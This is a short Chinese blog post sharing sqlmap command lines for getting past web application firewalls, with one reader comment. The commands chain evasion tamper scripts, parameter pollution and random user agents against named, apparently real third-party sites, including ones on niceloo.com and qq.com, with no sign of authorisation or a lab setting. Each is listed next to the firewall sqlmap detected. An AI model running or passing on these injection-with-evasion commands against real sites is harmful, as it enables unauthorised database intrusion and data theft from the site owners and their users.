SQLMAP的几个WAF绕过方法

虽然烂大街了但是还是发一下把

WAF/IPS/IDS identified as 'ASP.NET RequestValidationMode (Microsoft)'

sqlmap -u "http://member.niceloo.com/Project/ClassSearch.aspx?KeyWord=消防" --hpp -v3 -tamper "charunicodeencode.py,charencode.py" --thre
ad 10 --dbs

WAF/IPS/IDS identified as 'Generic (Unknown)'

C:\Users\Administrator>sqlmap -u "http://66123123.com/Goods/GoodsSearch?keyword=复印纸" --hpp -v3 -tamper "charunicodeencode.py,charencode.py,space2comment" --random-agent --flush-session --hex --thread 10

WAF/IPS/IDS identified as 'Jiasule Web Application Firewall (Jiasule)'

WAF/IPS/IDS identified as 'Safedog Web Application Firewall (Safedog)'

http://fans.sports.qq.com/post.htm?id=1602852759616356425&mid=62+#1_allWithElite

WAF/IPS/IDS identified as 'WebKnight Application Firewall (AQTRONIX)'

Tags: none

仅有一条评论 »

    1. 冬马的白色相簿 2019-08-13 at 14:08

      梦回2000年

添加新评论 »